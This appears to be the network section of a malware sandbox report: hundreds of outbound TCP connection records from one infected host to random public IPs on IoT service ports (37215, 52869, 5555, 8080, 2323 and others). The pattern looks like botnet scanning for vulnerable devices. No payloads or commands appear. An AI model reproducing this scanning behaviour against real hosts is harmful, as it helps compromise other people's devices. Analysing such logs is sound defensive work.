Source: global traffic	TCP traffic: 192.168.2.20:33342 -> 7.224.163.250:37215
Source: global traffic	TCP traffic: 192.168.2.20:60706 -> 118.114.67.42:8443
Source: global traffic	TCP traffic: 192.168.2.20:36038 -> 57.163.20.143:37215
Source: global traffic	TCP traffic: 192.168.2.20:44348 -> 193.22.15.210:81
Source: global traffic	TCP traffic: 192.168.2.20:47006 -> 94.185.176.145:49152
Source: global traffic	TCP traffic: 192.168.2.20:40084 -> 36.54.249.217:37215
Source: global traffic	TCP traffic: 192.168.2.20:44420 -> 160.226.225.149:8080
Source: global traffic	TCP traffic: 192.168.2.20:58870 -> 184.235.140.0:49152
Source: global traffic	TCP traffic: 192.168.2.20:46934 -> 130.140.7.168:52869
Source: global traffic	TCP traffic: 192.168.2.20:46600 -> 131.112.27.0:8080
Source: global traffic	TCP traffic: 192.168.2.20:50512 -> 184.49.220.2:49152
Source: global traffic	TCP traffic: 192.168.2.20:41120 -> 166.216.172.210:8080
Source: global traffic	TCP traffic: 192.168.2.20:42878 -> 98.135.167.186:5555
Source: global traffic	TCP traffic: 192.168.2.20:49854 -> 2.99.233.91:8080
Source: global traffic	TCP traffic: 192.168.2.20:51050 -> 50.192.24.84:52869
Source: global traffic	TCP traffic: 192.168.2.20:50412 -> 58.244.219.70:81
Source: global traffic	TCP traffic: 192.168.2.20:32830 -> 7.177.190.112:8080
Source: global traffic	TCP traffic: 192.168.2.20:43784 -> 134.67.11.73:37215
Source: global traffic	TCP traffic: 192.168.2.20:44900 -> 30.115.123.158:8443
Source: global traffic	TCP traffic: 192.168.2.20:60454 -> 51.78.124.189:81
Source: global traffic	TCP traffic: 192.168.2.20:49652 -> 212.212.35.40:8080
Source: global traffic	TCP traffic: 192.168.2.20:35566 -> 32.39.252.126:5555
Source: global traffic	TCP traffic: 192.168.2.20:36226 -> 92.69.32.77:5555
Source: global traffic	TCP traffic: 192.168.2.20:57598 -> 150.135.191.27:8080
Source: global traffic	TCP traffic: 192.168.2.20:54796 -> 89.138.225.184:8080
Source: global traffic	TCP traffic: 192.168.2.20:36964 -> 218.161.66.69:8080
Source: global traffic	TCP traffic: 192.168.2.20:34388 -> 34.89.63.52:7574
Source: global traffic	TCP traffic: 192.168.2.20:36622 -> 37.90.92.11:8080
Source: global traffic	TCP traffic: 192.168.2.20:40676 -> 93.90.210.200:8080
Source: global traffic	TCP traffic: 192.168.2.20:41186 -> 107.126.27.122:49152
Source: global traffic	TCP traffic: 192.168.2.20:39240 -> 103.85.14.140:8080
Source: global traffic	TCP traffic: 192.168.2.20:56124 -> 40.138.247.89:37215
Source: global traffic	TCP traffic: 192.168.2.20:51670 -> 8.12.234.110:7574
Source: global traffic	TCP traffic: 192.168.2.20:48120 -> 90.83.4.176:8080
Source: global traffic	TCP traffic: 192.168.2.20:42730 -> 165.66.227.31:49152
Source: global traffic	TCP traffic: 192.168.2.20:40102 -> 25.51.164.16:81
Source: global traffic	TCP traffic: 192.168.2.20:48710 -> 215.223.3.104:8443
Source: global traffic	TCP traffic: 192.168.2.20:52772 -> 140.112.93.27:5555
Source: global traffic	TCP traffic: 192.168.2.20:45486 -> 23.6.254.240:49152
Source: global traffic	TCP traffic: 192.168.2.20:37650 -> 94.18.108.108:37215
Source: global traffic	TCP traffic: 192.168.2.20:53028 -> 27.17.171.210:37215
Source: global traffic	TCP traffic: 192.168.2.20:55848 -> 83.12.51.114:7574
Source: global traffic	TCP traffic: 192.168.2.20:54254 -> 75.82.66.140:49152
Source: global traffic	TCP traffic: 192.168.2.20:40446 -> 64.114.216.199:8443
Source: global traffic	TCP traffic: 192.168.2.20:35228 -> 97.155.241.217:81
Source: global traffic	TCP traffic: 192.168.2.20:41312 -> 207.155.33.174:81
Source: global traffic	TCP traffic: 192.168.2.20:51226 -> 57.185.135.155:7574
Source: global traffic	TCP traffic: 192.168.2.20:51886 -> 83.239.71.57:8080
Source: global traffic	TCP traffic: 192.168.2.20:56614 -> 212.172.120.97:81
Source: global traffic	TCP traffic: 192.168.2.20:39904 -> 132.221.174.139:8080
Source: global traffic	TCP traffic: 192.168.2.20:48760 -> 189.165.80.3:49152
Source: global traffic	TCP traffic: 192.168.2.20:46982 -> 62.236.179.84:49152
Source: global traffic	TCP traffic: 192.168.2.20:39964 -> 19.32.33.10:8080
Source: global traffic	TCP traffic: 192.168.2.20:38028 -> 2.96.223.8:52869
Source: global traffic	TCP traffic: 192.168.2.20:48660 -> 109.31.128.69:52869
Source: global traffic	TCP traffic: 192.168.2.20:44258 -> 60.210.62.143:8080
Source: global traffic	TCP traffic: 192.168.2.20:51608 -> 189.24.15.173:8080
Source: global traffic	TCP traffic: 192.168.2.20:36080 -> 143.157.186.149:49152
Source: global traffic	TCP traffic: 192.168.2.20:37974 -> 33.131.76.243:8080
Source: global traffic	TCP traffic: 192.168.2.20:32806 -> 213.66.171.50:5555
Source: global traffic	TCP traffic: 192.168.2.20:45062 -> 174.75.143.253:8080
Source: global traffic	TCP traffic: 192.168.2.20:38136 -> 125.47.115.66:8080
Source: global traffic	TCP traffic: 192.168.2.20:37988 -> 116.96.140.222:81
Source: global traffic	TCP traffic: 192.168.2.20:51768 -> 205.65.176.52:8080
Source: global traffic	TCP traffic: 192.168.2.20:46330 -> 70.101.220.144:81
Source: global traffic	TCP traffic: 192.168.2.20:41050 -> 124.58.248.76:8080
Source: global traffic	TCP traffic: 192.168.2.20:59892 -> 93.89.24.103:8080
Source: global traffic	TCP traffic: 192.168.2.20:50658 -> 97.102.82.184:8443
Source: global traffic	TCP traffic: 192.168.2.20:57754 -> 47.24.59.44:8080
Source: global traffic	TCP traffic: 192.168.2.20:45324 -> 96.125.82.59:81
Source: global traffic	TCP traffic: 192.168.2.20:57666 -> 218.152.25.33:52869
Source: global traffic	TCP traffic: 192.168.2.20:39684 -> 57.102.106.47:8443
Source: global traffic	TCP traffic: 192.168.2.20:37290 -> 113.19.51.15:5555
Source: global traffic	TCP traffic: 192.168.2.20:50808 -> 40.92.162.99:7574
Source: global traffic	TCP traffic: 192.168.2.20:57416 -> 86.43.207.148:5555
Source: global traffic	TCP traffic: 192.168.2.20:56054 -> 106.161.219.27:81
Source: global traffic	TCP traffic: 192.168.2.20:55884 -> 163.184.153.227:8080
Source: global traffic	TCP traffic: 192.168.2.20:57918 -> 141.126.33.205:7574
Source: global traffic	TCP traffic: 192.168.2.20:52472 -> 116.221.170.83:49152
Source: global traffic	TCP traffic: 192.168.2.20:48092 -> 63.90.182.218:5555
Source: global traffic	TCP traffic: 192.168.2.20:47774 -> 7.21.198.0:8080
Source: global traffic	TCP traffic: 192.168.2.20:49264 -> 217.176.48.194:5555
Source: global traffic	TCP traffic: 192.168.2.20:41198 -> 167.62.66.41:7574
Source: global traffic	TCP traffic: 192.168.2.20:34862 -> 100.16.3.210:37215
Source: global traffic	TCP traffic: 192.168.2.20:57904 -> 76.8.208.127:8080
Source: global traffic	TCP traffic: 192.168.2.20:48356 -> 83.49.243.21:5555
Source: global traffic	TCP traffic: 192.168.2.20:41776 -> 134.251.70.154:81
Source: global traffic	TCP traffic: 192.168.2.20:38232 -> 211.77.98.194:8080
Source: global traffic	TCP traffic: 192.168.2.20:33816 -> 33.231.205.9:81
Source: global traffic	TCP traffic: 192.168.2.20:47970 -> 176.222.112.208:8443
Source: global traffic	TCP traffic: 192.168.2.20:34336 -> 170.166.81.83:8080
Source: global traffic	TCP traffic: 192.168.2.20:59896 -> 8.33.217.230:7574
Source: global traffic	TCP traffic: 192.168.2.20:39252 -> 48.177.79.80:8080
Source: global traffic	TCP traffic: 192.168.2.20:47010 -> 69.98.117.154:8080
Source: global traffic	TCP traffic: 192.168.2.20:51306 -> 107.82.103.68:81
Source: global traffic	TCP traffic: 192.168.2.20:60620 -> 114.207.0.228:49152
Source: global traffic	TCP traffic: 192.168.2.20:38214 -> 175.46.210.102:37215
Source: global traffic	TCP traffic: 192.168.2.20:46786 -> 195.19.159.232:81
Source: global traffic	TCP traffic: 192.168.2.20:59352 -> 16.197.247.12:49152
Source: global traffic	TCP traffic: 192.168.2.20:40358 -> 150.208.253.148:8080
Source: global traffic	TCP traffic: 192.168.2.20:42084 -> 200.109.140.124:52869
Source: global traffic	TCP traffic: 192.168.2.20:56678 -> 112.15.3.127:5555
Source: global traffic	TCP traffic: 192.168.2.20:56346 -> 135.200.130.160:8080
Source: global traffic	TCP traffic: 192.168.2.20:34610 -> 38.139.125.205:49152
Source: global traffic	TCP traffic: 192.168.2.20:38116 -> 115.221.72.54:49152
Source: global traffic	TCP traffic: 192.168.2.20:45314 -> 28.74.33.60:5555
Source: global traffic	TCP traffic: 192.168.2.20:51142 -> 114.83.134.162:37215
Source: global traffic	TCP traffic: 192.168.2.20:50068 -> 84.251.11.225:8080
Source: global traffic	TCP traffic: 192.168.2.20:58762 -> 61.139.160.110:8443
Source: global traffic	TCP traffic: 192.168.2.20:42906 -> 36.231.186.108:7574
Source: global traffic	TCP traffic: 192.168.2.20:33294 -> 209.91.20.132:52869
Source: global traffic	TCP traffic: 192.168.2.20:54846 -> 32.56.244.120:49152
Source: global traffic	TCP traffic: 192.168.2.20:59996 -> 91.31.219.112:81
Source: global traffic	TCP traffic: 192.168.2.20:33264 -> 22.115.11.18:8080
Source: global traffic	TCP traffic: 192.168.2.20:41658 -> 45.15.0.42:49152
Source: global traffic	TCP traffic: 192.168.2.20:35174 -> 66.225.40.228:7574
Source: global traffic	TCP traffic: 192.168.2.20:53400 -> 112.62.185.86:8080
Source: global traffic	TCP traffic: 192.168.2.20:47594 -> 158.6.58.6:8080
Source: global traffic	TCP traffic: 192.168.2.20:45558 -> 220.179.82.16:37215
Source: global traffic	TCP traffic: 192.168.2.20:42420 -> 101.205.175.231:81
Source: global traffic	TCP traffic: 192.168.2.20:34098 -> 44.66.17.187:37215
Source: global traffic	TCP traffic: 192.168.2.20:48334 -> 114.100.97.125:7574
Source: global traffic	TCP traffic: 192.168.2.20:56648 -> 56.103.247.65:81
Source: global traffic	TCP traffic: 192.168.2.20:49674 -> 59.150.94.42:8080
Source: global traffic	TCP traffic: 192.168.2.20:52518 -> 101.1.70.165:8080
Source: global traffic	TCP traffic: 192.168.2.20:47140 -> 203.63.207.193:52869
Source: global traffic	TCP traffic: 192.168.2.20:56190 -> 217.208.124.202:8080
Source: global traffic	TCP traffic: 192.168.2.20:60212 -> 4.119.113.119:52869
Source: global traffic	TCP traffic: 192.168.2.20:60478 -> 135.233.240.19:8443
Source: global traffic	TCP traffic: 192.168.2.20:48908 -> 211.64.237.240:52869
Source: global traffic	TCP traffic: 192.168.2.20:40858 -> 177.69.69.101:8080
Source: global traffic	TCP traffic: 192.168.2.20:39242 -> 163.101.185.176:5555
Source: global traffic	TCP traffic: 192.168.2.20:46542 -> 201.92.147.46:8080
Source: global traffic	TCP traffic: 192.168.2.20:32940 -> 159.234.185.133:81
Source: global traffic	TCP traffic: 192.168.2.20:35358 -> 202.214.128.209:49152
Source: global traffic	TCP traffic: 192.168.2.20:50750 -> 109.222.251.31:8080
Source: global traffic	TCP traffic: 192.168.2.20:53646 -> 173.41.202.36:5555
Source: global traffic	TCP traffic: 192.168.2.20:53022 -> 90.27.43.235:8080
Source: global traffic	TCP traffic: 192.168.2.20:50932 -> 80.48.253.30:8080
Source: global traffic	TCP traffic: 192.168.2.20:40526 -> 155.4.179.213:37215
Source: global traffic	TCP traffic: 192.168.2.20:44066 -> 179.37.139.184:49152
Source: global traffic	TCP traffic: 192.168.2.20:58510 -> 97.158.222.212:7574
Source: global traffic	TCP traffic: 192.168.2.20:34640 -> 87.226.205.134:37215
Source: global traffic	TCP traffic: 192.168.2.20:52590 -> 39.143.29.32:8443
Source: global traffic	TCP traffic: 192.168.2.20:54138 -> 213.150.115.196:52869
Source: global traffic	TCP traffic: 192.168.2.20:35864 -> 203.41.82.213:5555
Source: global traffic	TCP traffic: 192.168.2.20:55284 -> 190.76.26.149:7574
Source: global traffic	TCP traffic: 192.168.2.20:39364 -> 77.121.111.66:5555
Source: global traffic	TCP traffic: 192.168.2.20:58206 -> 188.187.254.99:7574
Source: global traffic	TCP traffic: 192.168.2.20:34792 -> 30.103.130.82:8080
Source: global traffic	TCP traffic: 192.168.2.20:39718 -> 99.183.96.40:49152
Source: global traffic	TCP traffic: 192.168.2.20:44044 -> 128.42.237.138:49152
Source: global traffic	TCP traffic: 192.168.2.20:43638 -> 84.10.4.162:8443
Source: global traffic	TCP traffic: 192.168.2.20:60674 -> 159.204.174.240:8080
Source: global traffic	TCP traffic: 192.168.2.20:51916 -> 39.33.177.25:8080
Source: global traffic	TCP traffic: 192.168.2.20:42610 -> 125.246.85.252:52869
Source: global traffic	TCP traffic: 192.168.2.20:42772 -> 80.155.51.0:8080
Source: global traffic	TCP traffic: 192.168.2.20:51712 -> 182.53.78.71:8080
Source: global traffic	TCP traffic: 192.168.2.20:39944 -> 57.22.136.117:5555
Source: global traffic	TCP traffic: 192.168.2.20:47454 -> 110.143.134.237:8443
Source: global traffic	TCP traffic: 192.168.2.20:37526 -> 66.168.225.187:8080
Source: global traffic	TCP traffic: 192.168.2.20:49332 -> 80.60.103.8:8080
Source: global traffic	TCP traffic: 192.168.2.20:42322 -> 54.133.252.147:8080
Source: global traffic	TCP traffic: 192.168.2.20:56298 -> 90.106.68.161:5555
Source: global traffic	TCP traffic: 192.168.2.20:60010 -> 82.6.17.28:49152
Source: global traffic	TCP traffic: 192.168.2.20:45454 -> 5.253.248.89:5555
Source: global traffic	TCP traffic: 192.168.2.20:58228 -> 216.151.191.61:49152
Source: global traffic	TCP traffic: 192.168.2.20:55260 -> 59.27.22.152:5555
Source: global traffic	TCP traffic: 192.168.2.20:59266 -> 13.48.97.208:8080
Source: global traffic	TCP traffic: 192.168.2.20:45154 -> 71.163.189.157:52869
Source: global traffic	TCP traffic: 192.168.2.20:40666 -> 210.156.134.129:5555
Source: global traffic	TCP traffic: 192.168.2.20:52054 -> 178.232.31.216:49152
Source: global traffic	TCP traffic: 192.168.2.20:58536 -> 26.66.8.104:8443
Source: global traffic	TCP traffic: 192.168.2.20:45552 -> 29.161.161.202:37215
Source: global traffic	TCP traffic: 192.168.2.20:56202 -> 14.9.89.162:37215
Source: global traffic	TCP traffic: 192.168.2.20:35034 -> 47.116.0.88:8080
Source: global traffic	TCP traffic: 192.168.2.20:33424 -> 153.192.200.52:8080
Source: global traffic	TCP traffic: 192.168.2.20:43688 -> 119.221.185.143:81
Source: global traffic	TCP traffic: 192.168.2.20:48322 -> 149.2.39.187:81
Source: global traffic	TCP traffic: 192.168.2.20:36866 -> 199.83.85.2:8443
Source: global traffic	TCP traffic: 192.168.2.20:45738 -> 8.195.49.95:8080
Source: global traffic	TCP traffic: 192.168.2.20:54054 -> 20.118.177.230:8080
Source: global traffic	TCP traffic: 192.168.2.20:51596 -> 211.90.22.130:52869
Source: global traffic	TCP traffic: 192.168.2.20:40030 -> 185.96.115.202:81
Source: global traffic	TCP traffic: 192.168.2.20:44914 -> 166.222.6.236:8443
Source: global traffic	TCP traffic: 192.168.2.20:54594 -> 210.154.170.145:8443
Source: global traffic	TCP traffic: 192.168.2.20:56846 -> 72.209.65.6:5555
Source: global traffic	TCP traffic: 192.168.2.20:35696 -> 107.206.64.63:49152
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 145.182.69.182:1023
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 221.181.153.172:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 177.188.60.106:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 2.54.64.238:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 97.10.202.197:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 58.230.150.58:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 150.63.40.57:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 90.207.158.126:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 117.133.86.215:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 76.55.5.193:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 188.62.48.155:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 80.252.193.51:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 65.51.41.97:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 196.58.211.126:1023
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 57.185.15.163:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 83.33.47.234:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 42.14.150.189:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 65.47.92.118:1023
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 101.250.208.133:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 76.185.246.95:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 41.76.28.201:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 150.194.5.177:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 190.35.110.173:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 150.27.113.8:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 20.155.76.246:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 149.131.65.238:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 154.17.234.146:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 162.227.63.156:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 147.133.65.211:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 14.227.22.208:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 1.254.121.146:1023
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 143.6.32.210:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 176.231.61.194:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 160.197.208.150:2323
Source: global traffic	TCP traffic: 192.168.2.20:58728 -> 181.184.100.201:5555
Source: global traffic	TCP traffic: 192.168.2.20:48060 -> 84.48.141.104:52869
Source: global traffic	TCP traffic: 192.168.2.20:46438 -> 150.37.72.24:52869
Source: global traffic	TCP traffic: 192.168.2.20:51796 -> 213.6.140.69:8080
Source: global traffic	TCP traffic: 192.168.2.20:37058 -> 20.39.219.107:81
Source: global traffic	TCP traffic: 192.168.2.20:60698 -> 36.215.1.47:8080
Source: global traffic	TCP traffic: 192.168.2.20:56426 -> 87.196.124.127:8080
Source: global traffic	TCP traffic: 192.168.2.20:56038 -> 203.33.70.125:8080
Source: global traffic	TCP traffic: 192.168.2.20:52674 -> 42.126.106.105:8080
Source: global traffic	TCP traffic: 192.168.2.20:52092 -> 26.80.202.172:52869
Source: global traffic	TCP traffic: 192.168.2.20:46258 -> 115.175.200.251:8080
Source: global traffic	TCP traffic: 192.168.2.20:38614 -> 169.108.144.27:5555
Source: global traffic	TCP traffic: 192.168.2.20:51460 -> 143.72.213.200:81
Source: global traffic	TCP traffic: 192.168.2.20:41802 -> 179.230.179.216:7574
Source: global traffic	TCP traffic: 192.168.2.20:43194 -> 73.105.97.89:81
Source: global traffic	TCP traffic: 192.168.2.20:55094 -> 122.144.5.143:8080
Source: global traffic	TCP traffic: 192.168.2.20:57972 -> 193.118.213.59:49152
Source: global traffic	TCP traffic: 192.168.2.20:56050 -> 44.15.17.151:8080
Source: global traffic	TCP traffic: 192.168.2.20:54570 -> 3.24.235.217:8080
Source: global traffic	TCP traffic: 192.168.2.20:40390 -> 24.139.116.18:8080
Source: global traffic	TCP traffic: 192.168.2.20:59268 -> 6.42.34.236:8080
Source: global traffic	TCP traffic: 192.168.2.20:35682 -> 107.100.37.172:8080
Source: global traffic	TCP traffic: 192.168.2.20:43186 -> 4.97.70.5:8443
Source: global traffic	TCP traffic: 192.168.2.20:38248 -> 112.31.181.246:8080
Source: global traffic	TCP traffic: 192.168.2.20:35444 -> 106.35.192.42:8443
Source: global traffic	TCP traffic: 192.168.2.20:47648 -> 45.102.94.126:7574
Source: global traffic	TCP traffic: 192.168.2.20:37882 -> 24.145.27.42:81
Source: global traffic	TCP traffic: 192.168.2.20:42216 -> 165.16.122.1:37215
Source: global traffic	TCP traffic: 192.168.2.20:39682 -> 27.20.114.90:37215
Source: global traffic	TCP traffic: 192.168.2.20:58278 -> 89.220.51.12:8080
Source: global traffic	TCP traffic: 192.168.2.20:51446 -> 11.163.212.152:5555
Source: global traffic	TCP traffic: 192.168.2.20:49398 -> 135.14.236.107:8080
Source: global traffic	TCP traffic: 192.168.2.20:34456 -> 119.138.58.232:7574
Source: global traffic	TCP traffic: 192.168.2.20:57300 -> 16.189.20.123:8443
Source: global traffic	TCP traffic: 192.168.2.20:54416 -> 60.147.4.225:8080
Source: global traffic	TCP traffic: 192.168.2.20:50322 -> 63.156.222.43:8080
Source: global traffic	TCP traffic: 192.168.2.20:39482 -> 6.86.153.110:52869
Source: global traffic	TCP traffic: 192.168.2.20:59164 -> 2.232.155.121:8080
Source: global traffic	TCP traffic: 192.168.2.20:60582 -> 215.96.13.140:8080
Source: global traffic	TCP traffic: 192.168.2.20:58826 -> 115.68.81.229:5555
Source: global traffic	TCP traffic: 192.168.2.20:55466 -> 63.119.139.18:52869
Source: global traffic	TCP traffic: 192.168.2.20:37268 -> 128.74.254.8:81
Source: global traffic	TCP traffic: 192.168.2.20:39216 -> 18.85.1.6:8080
Source: global traffic	TCP traffic: 192.168.2.20:39354 -> 50.117.194.170:81
Source: global traffic	TCP traffic: 192.168.2.20:50174 -> 194.203.125.103:37215
Source: global traffic	TCP traffic: 192.168.2.20:49104 -> 13.76.121.137:7574
Source: global traffic	TCP traffic: 192.168.2.20:52786 -> 209.110.181.128:5555
Source: global traffic	TCP traffic: 192.168.2.20:40564 -> 191.199.26.110:52869
Source: global traffic	TCP traffic: 192.168.2.20:49016 -> 161.225.141.251:52869
Source: global traffic	TCP traffic: 192.168.2.20:43880 -> 90.245.97.44:5555
Source: global traffic	TCP traffic: 192.168.2.20:57830 -> 113.102.129.74:8080
Source: global traffic	TCP traffic: 192.168.2.20:49722 -> 220.5.66.90:7574
Source: global traffic	TCP traffic: 192.168.2.20:42298 -> 46.218.39.117:8080
Source: global traffic	TCP traffic: 192.168.2.20:57694 -> 121.2.76.155:8080
Source: global traffic	TCP traffic: 192.168.2.20:60814 -> 116.172.79.18:37215
Source: global traffic	TCP traffic: 192.168.2.20:50774 -> 118.206.103.100:52869
Source: global traffic	TCP traffic: 192.168.2.20:33334 -> 194.83.51.26:8080
Source: global traffic	TCP traffic: 192.168.2.20:38302 -> 203.160.221.66:52869
Source: global traffic	TCP traffic: 192.168.2.20:57940 -> 1.121.96.1:81
Source: global traffic	TCP traffic: 192.168.2.20:48880 -> 113.220.235.137:5555
Source: global traffic	TCP traffic: 192.168.2.20:41484 -> 123.247.45.252:8080
Source: global traffic	TCP traffic: 192.168.2.20:47310 -> 151.169.69.96:52869
Source: global traffic	TCP traffic: 192.168.2.20:32952 -> 186.183.85.110:8080
Source: global traffic	TCP traffic: 192.168.2.20:48128 -> 4.105.129.133:8080
Source: global traffic	TCP traffic: 192.168.2.20:60652 -> 101.108.160.68:7574
Source: global traffic	TCP traffic: 192.168.2.20:56192 -> 49.41.213.146:37215
Source: global traffic	TCP traffic: 192.168.2.20:44982 -> 30.2.20.173:5555
Source: global traffic	TCP traffic: 192.168.2.20:54582 -> 103.148.212.55:37215
Source: global traffic	TCP traffic: 192.168.2.20:55776 -> 82.218.21.170:5555
Source: global traffic	TCP traffic: 192.168.2.20:49832 -> 67.136.232.53:81
Source: global traffic	TCP traffic: 192.168.2.20:45456 -> 139.130.197.234:81
Source: global traffic	TCP traffic: 192.168.2.20:39778 -> 66.231.13.119:37215
Source: global traffic	TCP traffic: 192.168.2.20:34896 -> 114.154.250.15:37215
Source: global traffic	TCP traffic: 192.168.2.20:56176 -> 222.42.34.127:8080
Source: global traffic	TCP traffic: 192.168.2.20:45010 -> 64.6.129.201:8080
Source: global traffic	TCP traffic: 192.168.2.20:33090 -> 201.46.243.205:5555
Source: global traffic	TCP traffic: 192.168.2.20:54022 -> 121.10.6.126:37215
Source: global traffic	TCP traffic: 192.168.2.20:46364 -> 1.41.63.236:8443
Source: global traffic	TCP traffic: 192.168.2.20:44732 -> 52.241.184.173:8080
Source: global traffic	TCP traffic: 192.168.2.20:54896 -> 174.159.13.210:81
Source: global traffic	TCP traffic: 192.168.2.20:60782 -> 35.205.25.55:52869
Source: global traffic	TCP traffic: 192.168.2.20:42086 -> 31.127.22.163:49152
Source: global traffic	TCP traffic: 192.168.2.20:49844 -> 40.55.105.19:8443
Source: global traffic	TCP traffic: 192.168.2.20:56240 -> 139.49.163.59:52869
Source: global traffic	TCP traffic: 192.168.2.20:35598 -> 67.93.178.237:52869
Source: global traffic	TCP traffic: 192.168.2.20:36694 -> 134.89.250.10:8443
Source: global traffic	TCP traffic: 192.168.2.20:33240 -> 20.134.119.118:8443
Source: global traffic	TCP traffic: 192.168.2.20:54778 -> 20.124.162.183:8080
Source: global traffic	TCP traffic: 192.168.2.20:33658 -> 2.185.196.129:49152
Source: global traffic	TCP traffic: 192.168.2.20:38818 -> 65.18.254.63:8080
Source: global traffic	TCP traffic: 192.168.2.20:60582 -> 54.185.240.6:8443
Source: global traffic	TCP traffic: 192.168.2.20:55772 -> 75.69.136.4:5555
Source: global traffic	TCP traffic: 192.168.2.20:48024 -> 51.203.73.42:8443
Source: global traffic	TCP traffic: 192.168.2.20:54130 -> 197.124.118.3:37215
Source: global traffic	TCP traffic: 192.168.2.20:37378 -> 214.227.33.211:7574
Source: global traffic	TCP traffic: 192.168.2.20:53398 -> 119.92.5.81:81
Source: global traffic	TCP traffic: 192.168.2.20:34966 -> 76.65.52.254:8080
Source: global traffic	TCP traffic: 192.168.2.20:50700 -> 79.102.239.202:7574
Source: global traffic	TCP traffic: 192.168.2.20:56052 -> 164.204.0.203:8080
Source: global traffic	TCP traffic: 192.168.2.20:35204 -> 154.190.122.88:49152
Source: global traffic	TCP traffic: 192.168.2.20:45824 -> 57.164.19.75:49152
Source: global traffic	TCP traffic: 192.168.2.20:52868 -> 64.4.79.9:8080
Source: global traffic	TCP traffic: 192.168.2.20:49928 -> 36.184.218.26:37215
Source: global traffic	TCP traffic: 192.168.2.20:44348 -> 158.253.181.50:8080
Source: global traffic	TCP traffic: 192.168.2.20:58166 -> 195.46.141.157:7574
Source: global traffic	TCP traffic: 192.168.2.20:56270 -> 139.68.173.122:7574
Source: global traffic	TCP traffic: 192.168.2.20:37010 -> 120.161.181.26:37215
Source: global traffic	TCP traffic: 192.168.2.20:49240 -> 199.133.40.189:8080
Source: global traffic	TCP traffic: 192.168.2.20:35188 -> 174.149.62.131:7574
Source: global traffic	TCP traffic: 192.168.2.20:52546 -> 124.85.154.4:5555
Source: global traffic	TCP traffic: 192.168.2.20:49494 -> 126.6.39.232:5555
Source: global traffic	TCP traffic: 192.168.2.20:54438 -> 90.8.126.238:8080
Source: global traffic	TCP traffic: 192.168.2.20:39510 -> 145.28.157.72:5555
Source: global traffic	TCP traffic: 192.168.2.20:44804 -> 145.143.20.200:8080
Source: global traffic	TCP traffic: 192.168.2.20:58322 -> 114.238.112.196:52869
Source: global traffic	TCP traffic: 192.168.2.20:41206 -> 111.205.48.104:49152
Source: global traffic	TCP traffic: 192.168.2.20:56846 -> 33.128.39.87:37215
Source: global traffic	TCP traffic: 192.168.2.20:49548 -> 216.251.87.103:8080
Source: global traffic	TCP traffic: 192.168.2.20:59488 -> 73.2.23.66:49152
Source: global traffic	TCP traffic: 192.168.2.20:43724 -> 69.68.78.9:8080
Source: global traffic	TCP traffic: 192.168.2.20:58448 -> 11.149.77.64:5555
Source: global traffic	TCP traffic: 192.168.2.20:37030 -> 11.16.15.161:7574
Source: global traffic	TCP traffic: 192.168.2.20:41248 -> 68.179.189.189:52869
Source: global traffic	TCP traffic: 192.168.2.20:58532 -> 6.60.84.48:49152
Source: global traffic	TCP traffic: 192.168.2.20:36830 -> 221.116.192.198:8080
Source: global traffic	TCP traffic: 192.168.2.20:50814 -> 69.79.211.26:81
Source: global traffic	TCP traffic: 192.168.2.20:58462 -> 160.135.77.199:8080
Source: global traffic	TCP traffic: 192.168.2.20:52936 -> 164.95.36.160:8080
Source: global traffic	TCP traffic: 192.168.2.20:52276 -> 132.1.164.140:5555
Source: global traffic	TCP traffic: 192.168.2.20:40696 -> 75.154.151.151:8443
Source: global traffic	TCP traffic: 192.168.2.20:51414 -> 130.90.198.10:7574
Source: global traffic	TCP traffic: 192.168.2.20:54374 -> 138.68.113.164:8443
Source: global traffic	TCP traffic: 192.168.2.20:34274 -> 54.177.250.248:81
Source: global traffic	TCP traffic: 192.168.2.20:40648 -> 160.8.93.233:8443
Source: global traffic	TCP traffic: 192.168.2.20:59908 -> 178.123.18.214:37215
Source: global traffic	TCP traffic: 192.168.2.20:50452 -> 131.228.7.91:52869
Source: global traffic	TCP traffic: 192.168.2.20:55162 -> 181.221.30.207:7574
Source: global traffic	TCP traffic: 192.168.2.20:46854 -> 55.169.99.112:49152
Source: global traffic	TCP traffic: 192.168.2.20:54246 -> 37.117.214.1:8080
Source: global traffic	TCP traffic: 192.168.2.20:39974 -> 80.219.251.133:52869
Source: global traffic	TCP traffic: 192.168.2.20:33450 -> 69.12.226.143:81
Source: global traffic	TCP traffic: 192.168.2.20:33268 -> 76.213.165.145:49152
Source: global traffic	TCP traffic: 192.168.2.20:40022 -> 65.145.116.36:8080
Source: global traffic	TCP traffic: 192.168.2.20:52920 -> 60.5.129.42:8080
